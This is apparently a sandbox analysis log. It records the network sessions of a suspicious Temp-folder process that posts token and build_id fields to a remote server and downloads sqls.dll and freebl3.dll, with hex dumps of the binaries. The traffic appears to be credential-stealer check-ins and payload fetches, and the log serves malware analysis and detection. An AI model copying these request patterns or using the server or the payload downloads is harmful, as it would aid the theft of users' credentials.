2024-05-26 08:31:10 UTC	5557	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CBAFCAKEHDHDHIDHDGDHCont
2024-05-26 08:31:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:11 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49748	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:12 UTC	194	OUT	GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:12 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:12 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 May 2024 10:18:21 GMT Connection: close ETag: "6650696d-258600" Accept-Ranges: bytes
2024-05-26 08:31:12 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-05-26 08:31:12 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49751	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:15 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:15 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GIEHIDHJDBFIIECAKECBCont
2024-05-26 08:31:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49754	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:18 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:18 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GDBAKEGIDBGIEBFHDHJJCont
2024-05-26 08:31:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49756	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:19 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:19 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BKFBAKFCBFHIJJJJDBFCCont
2024-05-26 08:31:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49759	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:20 UTC	173	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-26 08:31:20 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:20 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-05-26 08:31:20 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-05-26 08:31:20 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-05-26 08:31:20 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-05-26 08:31:20 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
